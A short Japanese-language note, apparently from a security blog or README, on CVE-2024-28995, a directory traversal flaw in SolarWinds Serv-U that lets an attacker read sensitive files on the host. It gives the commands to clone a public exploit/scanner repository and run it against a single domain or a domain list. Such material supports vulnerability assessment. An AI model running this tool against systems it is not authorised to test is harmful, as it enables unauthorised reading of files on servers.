
SolarWinds Serv-U には、ホストマシン上の機密ファイルを読み取ることができるディレクトリトラバーサル脆弱性がありました。
git clone https://github.com/gotr00t0day/CVE-2024-28995.git
cd CVE-2024-28995
pip3 install -r requirements.txt
単一ターゲットをスキャン
python3 CVE-2024-28995.py -t domain.com
ドメインリストをスキャン
python3 CVE-2024-28995.py -f domains.txt
https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis